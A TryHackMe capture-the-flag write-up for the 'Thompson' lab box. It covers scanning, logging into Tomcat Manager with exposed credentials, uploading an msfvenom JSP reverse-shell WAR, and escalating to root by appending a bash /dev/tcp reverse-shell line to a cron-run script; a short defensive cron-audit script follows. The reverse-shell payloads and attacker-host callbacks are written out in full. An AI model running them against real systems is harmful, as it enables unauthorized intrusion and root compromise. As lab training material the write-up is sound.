Tryhackme Write-up — Thompson

SVR Aravind
5 min read, Jun 9, 2021

A beginner-level, easy Capture The Flag (CTF) that challenges newcomers to solve a variety of tasks using readily available tools and to break into a server to steal data. In this post, a course task from HackerU: RED Team Pentester, I will show the steps I followed to get the flags.

Basic checks to perform before attacking the machine:

1. Power on the target machine and make a note of its IP address.

2. Start your Kali virtual machine.

3. Connect to the TryHackMe OpenVPN

# sudo openvpn <vpn-file-name>

Step 1

Nmap (Network Mapper): Enumeration

Let's start with an nmap scan

# nmap -A -sCV -Pn --reason <Target Machine IP>

-A: aggressive scan. It runs OS detection, version detection, script scanning and traceroute, so you get a quick picture of what is useful and what is not.

-sV: version detection. Useful for searching for exploits tied to the specific version of a running service.

-Pn: treat all hosts as online, i.e. skip host discovery.

-sC: equivalent to --script=default.

You can type "man nmap" to view a summary of the options.

The box is running Apache Tomcat on port 8080. Now let's open it in our web browser.

Two other ports are open: SSH and port 8009.

You get the Apache Tomcat default page. View the page source and you can see the directories listed; traditionally you will see the same directories if the gobuster directory search tool is used, depending on the wordlist. Let us start with a gobuster scan

# gobuster dir -u http://<Target Machine IP>:<Port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x .php,.html,.txt,.js

The directory search returns a directory that can be explored further. The default Tomcat Manager, when opened in the browser, prompts for a username and password. Try some default credentials; nothing works. When you click on the cancel button, the resulting 401 page contains a username and password, a nice way of putting them right there.

# <Target Machine IP>:<Port>/<Directory Name>

When you enter those credentials, you can access the Tomcat Application Manager. As you scroll down the page you will find an option to upload a payload and gain access to the system.

[Screenshot: After entering the credentials]
[Screenshot: Option to upload a payload]

How do we know what payload to create and upload? If you look at the /examples directory you can find JSP samples. We can create a JSP payload with msfvenom and upload it to gain initial access.

Command

msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war

Switches used:

-p: the payload to use

-f: the output file format

LHOST: the IP address the victim machine should connect back to (the attacker's IP address)

LPORT: the port the victim machine should connect to (where the attacker is listening)

[Screenshot: msfvenom payload]
[Screenshot: Browse to the payload and click on Deploy]

You can find the uploaded reverse payload listed on the Tomcat App Manager screen. Start a netcat listener on the Kali attacker machine and click on the reverse payload.

[Screenshot: Received initial shell access]

Stabilise the shell by entering the commands as shown.

From the above commands you can find who the current user is and the id of that user. Navigate to the home directory and the first flag is captured.

The next task is to obtain the root flag, that is, privilege escalation. In jack's home directory you can find two files: id.sh and test.txt. The content of test.txt is being executed as root, and id.sh is being executed as jack.

Upload the ever-useful linpeas.sh from the attacker machine to the target machine.

On the attacker machine, navigate to the linpeas directory and locate the file linpeas.sh, then serve it with:

python3 -m http.server 9000

Go to the target machine. Change directory to /dev/shm or /tmp in case of permission issues in the home folder.

In the terminal enter

"wget http://<Attacker Machine IP>:<Port>/linpeas.sh"

Make linpeas.sh executable with "chmod +x linpeas.sh"

Execute it and always write the output to a file:

./linpeas.sh > linpeas.log

Open the log in any text editor and you can see that id.sh is scheduled to run every minute.

Add the following command to id.sh. Make sure the quotes and special characters are not omitted.

echo "/bin/bash -c 'bash -i >& /dev/tcp/<Kali Attacker Machine IP>/<Port No> 0>&1'" >> id.sh

Start a netcat listener on the Kali attacker machine and wait a minute for the cron job to execute. We drop in as root and capture the root flag.
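As an added defender-side example (not from the original write-up), here is a small Python audit for the misconfiguration that hands over root on this box: a cron job running a script as root while a lower-privileged user can modify that script. The crontab lines, file modes and uids below are constructed stand-ins; on a real host you would feed it /etc/crontab together with os.stat and pwd lookups.

```python
import re
import stat

# Constructed /etc/crontab-style sample (five time fields, run-as user, command).
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/1 * * * * root /home/jack/id.sh
0   3 * * * root /usr/local/bin/backup.sh
*/5 * * * * jack /home/jack/cleanup.sh
"""
# Constructed stand-in for os.stat() results: path -> (st_mode, st_uid).
SAMPLE_FILES = {
    "/home/jack/id.sh": (0o100777, 1000),       # jack's file, world-writable
    "/usr/local/bin/backup.sh": (0o100755, 0),  # root-owned, root-only write
    "/home/jack/cleanup.sh": (0o100755, 1000),  # jack's script, runs as jack
}
SAMPLE_UIDS = {"root": 0, "jack": 1000}  # stand-in for pwd lookups

CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_system_crontab(text):
    """(run_as_user, first command token) per active line; compound commands
    such as 'cd /x && bash y.sh' still need a manual look."""
    entries = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if m and not line.lstrip().startswith("#"):
            entries.append((m.group("user"), m.group("cmd").split()[0]))
    return entries

def writable_below_run_as(mode, owner_uid, run_as_uid):
    """Reason a user other than root or the run-as user could edit the script
    (and so run code as run_as_uid), or None if nobody lower can."""
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP:
        return "group-writable"
    if owner_uid not in (0, run_as_uid):
        return "owned by uid %d but runs as uid %d" % (owner_uid, run_as_uid)
    return None

def audit_crontab(text, files, uids):
    """files: path -> (mode, owner uid); uids: name -> uid. Returns a list of
    (run_as_user, path, reason) for every entry a lower user could hijack."""
    findings = []
    for user, path in parse_system_crontab(text):
        if path in files and user in uids:  # unknown script or user: skip
            reason = writable_below_run_as(*files[path], uids[user])
            if reason:
                findings.append((user, path, reason))
    return findings
```

On the sample data only the root-run, world-writable id.sh is reported; the root-owned backup script and jack's own script running as jack are left alone.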

Thank you for reading this write-up. I hope it was clear.
